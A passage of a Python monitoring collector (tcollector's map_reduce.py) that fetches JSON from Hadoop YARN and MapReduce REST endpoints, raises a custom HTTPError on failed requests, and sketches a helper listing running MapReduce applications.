resp = requests.get('%s%s' % (self.http_prefix, uri))
if resp.status_code != 200:
raise HTTPError('%s%s' % (self.http_prefix, uri))
return resp.json()
def request_url(self, url):
resp = requests.get(url)
if resp.status_code != 200:
if resp.status_code > 500:
self.log_exception("mapreduce collector can not access url : %s" % url)
raise HTTPError(url)
return resp.json()
class HTTPError(RuntimeError):
def __init__(self, resp):
RuntimeError.__init__(self, str(resp))
self.resp = resp
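# Standalone usage sketch (illustrative, not part of the original collector):
# queries the YARN ResourceManager directly with requests, mirroring
# _get_running_app_ids above. The host and port defaults are placeholder
# assumptions, not values read from the collector config.
def _list_running_mapreduce_apps_sketch(host='localhost', port=8088):
    url = 'http://%s:%s/%s?states=RUNNING&applicationTypes=MAPREDUCE' % (
        host, port, REST_API['YARN_APPS_PATH'])
    resp = requests.get(url)
    if resp.status_code != 200:
        raise HTTPError(url)
    apps = resp.json().get('apps') or {}
    return [(app.get('id'), app.get('trackingUrl')) for app in apps.get('app') or []]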
| wangy1931/tcollector | collectors/builtin/map_reduce.py | Python | lgpl-3.0 | 11,834 | 0.003634 |